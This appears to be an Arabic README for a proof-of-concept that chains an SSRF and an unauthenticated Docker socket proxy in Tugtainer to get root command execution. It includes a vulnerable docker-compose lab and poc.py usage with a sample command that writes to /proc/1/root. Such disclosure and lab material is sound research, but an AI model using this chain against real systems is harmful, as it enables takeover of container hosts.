
مزيج من CVE-2026-55494 و CVE-2026-62308 للحصول على امتيازات الجذر RCE في tugtainer
يتم الحصول على ثغرة تنفيذ الأوامر عن بُعد (RCE) من خلال استغلال ثغرتين:
باختصار، يتم استغلال ثغرة SSRF للاتصال بخدمة غير موثقة في الشبكة الداخلية لإنشاء حاوية دوكر تشارك نفس PID مع Tugtainer، مما يجعل نظام ملفات حاوية Tugtainer قابلًا للوصول عبر /proc/1/root، وبما أن الحاوية المنشأة تمتلك صلاحيات المستخدم الجذر، فأنت تمتلك تقنيًا صلاحيات جذر على نظام حاوية Tugtainer.
docker-compose.yml المرفق في هذا المستودع، أو انسخ والصق ما يلي:networks:
tugtainer:
driver: bridge
services:
socket-proxy:
image: lscr.io/linuxserver/socket-proxy:latest
container_name: socket-proxy
environment:
CONTAINERS: 1
EVENTS: 1
IMAGES: 1
INFO: 1
LOG_LEVEL: warning
PING: 1
NETWORKS: 1
POST: 1
TZ: Europe/Moscow
VERSION: 1
volumes:
- /var/run/docker.sock:/var/run/docker.sock:ro
restart: unless-stopped
read_only: true
tmpfs:
- /run
networks:
- tugtainer
labels:
dev.quenary.tugtainer.protected: True
app:
depends_on:
- socket-proxy
container_name: tugtainer
image: ghcr.io/quenary/tugtainer:1.30.2
tmpfs:
- /tugtainer:size=100m
restart: unless-stopped
environment:
DOCKER_HOST: tcp://socket-proxy:2375
networks:
- tugtainer
ports:
- '9412:80'
labels:
dev.quenary.tugtainer.protected: True
poc.py على النحو التالي:$ python poc.py <URL> <PASSWORD> <COMMAND>
$ python poc.py http://localhost:9412 Admin123! "whoami > /proc/1/root/tmp/pwned"
pwned في حاوية Tugtainer داخل /tmp.